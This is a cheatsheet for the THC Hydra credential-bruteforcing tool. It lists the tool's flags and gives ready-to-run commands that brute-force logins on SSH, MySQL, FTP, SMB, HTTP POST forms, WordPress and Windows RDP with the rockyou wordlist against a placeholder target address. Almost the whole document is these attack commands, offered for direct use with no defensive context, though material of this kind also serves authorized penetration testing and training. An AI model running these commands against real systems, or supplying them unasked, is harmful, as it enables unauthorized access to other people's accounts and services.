A cheatsheet for the THC Hydra bruteforcing tool. THC Hydra is a tool developed by van Hauser / THC for bruteforcing credentials on multiple protocols.

• Cheatsheet
  • Basic Usage
    • Syntax
    • Useful flags
  • SSH
  • MySQL
  • FTP
  • SMB
  • HTTP Post Form
  • Wordpress
  • Windows RDP

Cheatsheet

Basic Usage

Syntax

hydra [OPTIONS] IP

Useful flags

• -h: see the help menu
• -l <LOGIN>: Pass single username/login
• -L <FILE>: Pass multiple usernames/logins
• -p <LOGIN>: Pass single known password
• -P <FILE>: Pass a password list or wordlist (ex.: rockyou.txt)
• -s <PORT>: Use custom port
• -f: Exit as soon as at least one a login and a password combination is found
• -R: Restore previous session (if crashed/aborted)

SSH

Bruteforce SSH credentials

hydra -f -l user -P /usr/share/wordlists/rockyou.txt $IP -t 4 ssh

(use -s for custom port)

MySQL

Bruteforce MySQL credentials

hydra -f -l user -P /usr/share/wordlists/rockyou.txt $IP mysql

(use -s for custom port)

FTP

Bruteforce FTP credentials

hydra -f -l user -P /usr/share/wordlists/rockyou.txt $IP ftp

(use -s for custom port)

SMB

Bruteforce SMB credentials

hydra -f -l user -P /usr/share/wordlists/rockyou.txt $IP smb

(use -s for custom port)

HTTP Post Form

Bruteforce web HTTP form

hydra -l user -P /usr/share/wordlists/rockyou.txt $IP http-post-form "<Login Page>:<Request Body>:<Error Message>"

(use -s for custom port)

Ex.:

hydra -l user -P /usr/share/wordlists/rockyou.txt $IP http-post-form "/login.php:username=^USER^&password=^PASS^:Login Failed"

Wordpress

Bruteforce WordPress credentials

hydra -f -l user -P /usr/share/wordlists/rockyou.txt $IP -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'

(use -s for custom port)

Windows RDP

Bruteforce Windows Remote Desktop credentials

hydra -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$IP